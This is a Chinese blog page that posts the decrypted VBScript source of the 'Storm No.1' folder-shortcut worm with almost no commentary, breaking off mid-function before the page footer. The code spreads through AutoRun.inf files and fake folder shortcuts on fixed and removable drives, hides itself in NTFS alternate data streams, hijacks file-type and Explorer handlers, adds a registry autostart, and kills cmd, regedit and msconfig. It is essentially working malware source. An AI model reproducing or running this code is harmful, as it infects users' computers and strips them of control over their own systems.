关闭

解密后的暴风一号病毒(1KB文件夹快捷方式病毒)

标签: 病毒
611人阅读 评论(0) 收藏 举报
分类:

On Error Resume Next
Dim Fso,WshShell
Set Fso=CreateObject(“scRiPTinG.fiLEsysTeMoBjEcT”)
Set WshShell=CreateObject(“wScRipT.SHelL”)
Call Main()
Sub Main()
On Error Resume Next
Dim Args, VirusLoad, VirusAss
Set Args=WScript.Arguments
VirusLoad=GetMainVirus(1)
VirusAss=GetMainVirus(0)
ArgNum=0

Do While ArgNum < Args.Count
    Param=Param&" "&Args(ArgNum)
    ArgNum=ArgNum + 1
Loop
SubParam=LCase(Right(Param, 3))

Select Case SubParam
Case "run"
    RunPath=Left(WScript.ScriptFullName, 2)
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "txt", "log","ini" ,"inf"
    RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&Param
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "bat", "cmd"
    RunPath="CMD /c echo Hi!I'm here!&pause"
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "reg"
    RunPath="regedit.exe "&""""&Trim(Param)&""""
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "chm"
    RunPath="hh.exe "&""""&Trim(Param)&""""
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "hlp"
    RunPath="winhlp32.exe "&""""&Trim(Param)&""""
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "dir"
    RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "oie"
    RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "omc"
    RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case "emc"
    RunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
    Call Run(RunPath)
    Call InvadeSystem(VirusLoad,VirusAss)
    Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)

Case Else
    If PreDblInstance=True Then
        WScript.Quit
    End If
    Timeout = Datediff("ww", GetInfectedDate, Date) - 12
    If Timeout>0 And Month(Date) = Day(Date) Then
        Call VirusAlert()
        Call MakeJoke(CInt(Month(Date)))
    End If
    Call MonitorSystem()

End Select

End Sub

Sub MonitorSystem()
On Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames=Array(“cmd.exe”,”cmd.com”,”regedit.exe”,”regedit.scr”,”regedit.pif”,”regedit.com”,”msconfig.exe”)
VBSFullNames=Array(GetMainVirus(1))
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub

Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value=”“”“&VirusLoadPath&”“””
File_Value=”%SystemRoot%\System32\WScript.exe “&”“”“&VirusAssPath&”“”“&” %1 %* ”
IE_Value=”%SystemRoot%\System32\WScript.exe “&”“”“&VirusAssPath&”“”“&” OIE ”
MyCpt_Value1=”%SystemRoot%\System32\WScript.exe “&”“”“&VirusAssPath&”“”“&” OMC ”
MyCpt_Value2=”%SystemRoot%\System32\WScript.exe “&”“”“&VirusAssPath&”“”“&” EMC ”
HCULoad=”HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load”
HCUVer=”HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver”
HCUDate=”HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date”
VirusCode=GetCode(WScript.ScriptFullName)
Version=1
HostSourcePath=Fso.GetSpecialFolder(1)&”\Wscript.exe”
HostFilePath=Fso.GetSpecialFolder(0)&”\system\svchost.exe”

For Each Drive In Fso.Drives
    If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) Then
        DiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"
            Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
            Call InfectRoot(Drive.DriveLetter,DiskVirusName)
    End If
Next

If FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then
    If GetFileSystemType(GetSystemDrive())="NTFS" Then
        Call CreateFile(VirusCode,VirusAssPath)
        Call CreateFile(VirusCode,VirusLoadPath)
        Call CopyFile(HostSourcePath,HostFilePath)
        Call SetHiddenAttr(HostFilePath)
    Else
        Call CreateFile(VirusCode, VirusAssPath)
        Call SetHiddenAttr(VirusAssPath)
        Call CreateFile(VirusCode,VirusLoadPath)
        Call SetHiddenAttr(VirusLoadPath)
        Call CopyFile(HostSourcePath, HostFilePath)
        Call SetHiddenAttr(HostFilePath)
    End If
End If

If ReadReg(HCULoad)<>Load_Value  Then
    Call WriteReg (HCULoad, Load_Value, "")
End If

If GetVersion() < Version Then
    Call WriteReg (HCUVer, Version, "")
End If

If GetInfectedDate() = "" Then
    Call WriteReg (HCUDate, Date, "")
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>File_Value Then
    Call SetTxtFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\")<>File_Value Then
    Call SetIniFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\")<>File_Value Then
    Call SetInfFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\")<>File_Value Then
    Call SetBatFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\")<>File_Value Then
    Call SetCmdFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>File_Value Then
    Call SetRegFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>File_Value Then
    Call SetchmFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>File_Value Then
    Call SethlpFileAss(VirusAssPath)
End If

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\")<>IE_Value Then
    Call SetIEAss(VirusAssPath)
End If

If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\")<>IE_Value Then
    Call SetIEAss(VirusAssPath)
End If

If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\")<>MyCpt_Value1 Then
    Call SetMyComputerAss(VirusAssPath)
End If

If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\")<>MyCpt_Value2 Then
    Call SetMyComputerAss(VirusAssPath)
End If

Call RegSet()

End Sub

Sub CopyFile(source, pathf)
On Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub

Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub

Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub

Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1=”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue”
RegPath2=”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”
RegPath3=”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun”
RegPath4=”HKEY_CLASSES_ROOT\lnkfile\IsShortcut”
Call WriteReg (RegPath1, 3, “REG_DWORD”)
Call WriteReg (RegPath2, 2, “REG_DWORD”)
Call WriteReg (RegPath3, 0, “REG_DWORD”)
Call DeleteReg (RegPath4)
End Sub

Sub KillProcess(ProcessNames)
On Error Resume Next
Set WMIService=GetObject(“winmgmts:\.\root\cimv2”)
For Each ProcessName in ProcessNames
Set ProcessList=WMIService.execquery(” Select * From win32_process where name =’”&ProcessName&”’ “)
For Each Process in ProcessList
IntReturn=Process.terminate
If intReturn<>0 Then
WshShell.Run “CMD /c ntsd -c q -p “&Process.Handle, vbHide, False
End If
Next
Next
End Sub

Sub KillImmunity(D)
On Error Resume Next
ImmunityFolder=D&”:\Autorun.inf”
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run (“CMD /C CACLS “& “”“”&ImmunityFolder&”“”” &” /t /e /c /g everyone:f”),vbHide,True
WshSHell.Run (“CMD /C RD /S /Q “& ImmunityFolder), vbHide, True
End If
End Sub

Sub KeepProcess(VBSFullNames)
On Error Resume Next
For Each VBSFullName in VBSFullNames
If VBSProcessCount(VBSFullName) < 2 then
Run(“%SystemRoot%\system\svchost.exe “&VBSFullName)
End If
Next
End Sub

Function GetSystemDrive()
GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)
End Function

Function GetFileSystemType(Drive)
Set d=FSO.GetDrive(Drive)
GetFileSystemType=d.FileSystem
End Function

Function ReadReg(strkey)
Dim tmps
Set tmps=CreateObject(“WScript.Shell”)
ReadReg=tmps.RegRead(strkey)
Set tmps=Nothing
End Function

Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps=CreateObject(“WScript.Shell”)
If vtype=”” Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps=Nothing
End Sub

Sub DeleteReg(strkey)
Dim tmps
Set tmps=CreateObject(“WScript.Shell”)
tmps.RegDelete strkey
Set tmps=Nothing
End Sub

Sub SetHiddenAttr(path)
On Error Resume Next
Dim vf
Set vf=FSO.GetFile(path)
Set vf=FSO.GetFolder(path)
vf.Attributes=6
End Sub

Sub Run(ExeFullName)
On Error Resume Next
Dim WshShell
Set WshShell=WScript.CreateObject(“WScript.Shell”)
WshShell.Run ExeFullName
Set WshShell=Nothing
End Sub

Sub InfectRoot(D,VirusName)
On Error Resume Next
Dim VBSCode
VBSCode=GetCode(WScript.ScriptFullName)
VBSPath=D&”:\”&VirusName
If FSO.FileExists(VBSPath)=False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
End If
Set Folder=Fso.GetFolder(D&”:\”)
Set SubFolders=Folder.Subfolders
For Each SubFolder In SubFolders
SetHiddenAttr(SubFolder.Path)
LnkPath=D&”:\”&SubFolder.Name&”.lnk”
TargetPath=D&”:\”&VirusName
Args=”“”“&D&”:\”&SubFolder.Name& “\Dir”“”
If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath Then
If Fso.FileExists(LnkPath)=True Then
FSO.DeleteFile LnkPath, True
End If
Call CreateShortcut(LnkPath,TargetPath,Args)
End If
Next
End Sub

Sub CreateShortcut(LnkPath,TargetPath,Args)
Set Shortcut=WshShell.CreateShortcut(LnkPath)
with Shortcut
.TargetPath=TargetPath
.Arguments=Args
.WindowStyle=4
.IconLocation=”%SystemRoot%\System32\Shell32.dll, 3”
.Save
end with
End Sub

Sub CreateAutoRun(D,VirusName)
On Error Resume Next
Dim InfPath, VBSPath, VBSCode
InfPath=D&”:\AutoRun.inf”
VBSPath=D&”:\”&VirusName
VBSCode=GetCode(WScript.ScriptFullName)
If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
StrInf=”[AutoRun]”&VBCRLF&”Shellexecute=WScript.exe “&VirusName&” “”AutoRun”“”&VBCRLF&”shell\open=打开(&O)”&VBCRLF&”shell\open\command=WScript.exe “&VirusName&” “”AutoRun”“”&VBCRLF&”shell\open\Default=1”& VBCRLF&”shell\explore=资源管理器(&X)”&VBCRLF&”shell\explore\command=WScript.exe “&VirusName&” “”AutoRun”“”
Call KillImmunity(D)
Call CreateFile(StrInf, InfPath)
Call SetHiddenAttr(InfPath)
End If
End Sub

Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetIniFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetInfFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetBatFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetCmdFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” %1 %* ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetIEAss(sFilePath)
On Error Resume Next
Dim Value
Value=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” OIE ”
Call WriteReg(“HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\”, Value, “REG_EXPAND_SZ”)
Call WriteReg(“HKEY_CLASSES_ROOT\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\”, Value, “REG_EXPAND_SZ”)
End Sub

Sub SetMyComputerAss(sFilePath)
On Error Resume Next
Dim Value1,Value2
Value1=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” OMC ”
Value2=”%SystemRoot%\System32\WScript.exe “&”“”“&sFilePath&”“”“&” EMC ”
Call WriteReg(“HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\”, “”, “REG_SZ”)
Call WriteReg(“HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\”, Value1, “REG_EXPAND_SZ”)
Call WriteReg(“HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\”, Value2, “REG_EXPAND_SZ”)
End Sub

Function GetSerialNumber(Drv)
On Error Resume Next
Set d=fso.GetDrive(Drv)
GetSerialNumber=d.SerialNumber
GetSerialNumber=Replace(GetSerialNumber,”-“,”“)
End Function

Function GetMainVirus(N)
On Error Resume Next
MainVirusName=GetSerialNumber(GetSystemDrive())&”.vbs”
If GetFileSystemType(GetSystemDrive())=”NTFS” Then
If N=1 Then
GetMainVirus=Fso.GetSpecialFolder(N)&”\smss.exe:”&MainVirusName
End If
If N=0 Then
GetMainVirus=Fso.GetSpecialFolder(N)&”\explorer.exe:”&MainVirusName
End If
Else
GetMainVirus=Fso.GetSpecialFolder(N)&”\”&MainVirusName
End If
End Function

Function VBSProcessCount(VBSPath)
On Error Resume Next
Dim WMIService, ProcessList, Process
VBSProcessCount=0
Set WMIService=GetObject(“winmgmts:\.\root\cimv2”)
Set ProcessList=WMIService.ExecQuery(“Select * from Win32_Process Where “&”Name=’cscript.exe’ or Name=’wscript.exe’ or Name=’svchost.exe’”)
For Each Process in ProcessList
If InStr(Process.CommandLine, VBSPath)>0 Then
VBSProcessCount=VBSProcessCount+1
End If
Next
End Function

Function PreDblInstance()
On Error Resume Next
PreDblInstance=False
If VBSProcessCount(WScript.ScriptFullName)>= 3 Then
PreDblInstance=True
End If
End Function

Function GetTargetPath(LnkPath)
On Error Resume Next
Dim Shortcut
Set Shortcut=WshShell.CreateShortcut(LnkPath)
GetTargetPath=Shortcut.TargetPath
End Function

Function GetCode(FullPath)
On Error Resume Next
Dim FileText
Set FileText=FSO.OpenTextFile(FullPath, 1)
GetCode=FileText.ReadAll
FileText.Close
End Function

Function GetVersion()
Dim VerInfo
VerInfo=”HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver”
If ReadReg(VerInfo)=”” Then
GetVersion=0
Else
GetVersion=CInt(ReadReg(VerInfo))
End If
End Function

Sub VirusAlert()
On Error Resume Next
Dim HtaPath,HtaCode
HtaPath=Fso.GetSpecialFolder(1)&”\BFAlert.hta”
HtaCode=”暴风一号“&VBCRLF&”

1
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:21540次
    • 积分:607
    • 等级:
    • 排名:千里之外
    • 原创:35篇
    • 转载:26篇
    • 译文:0篇
    • 评论:2条
    最新评论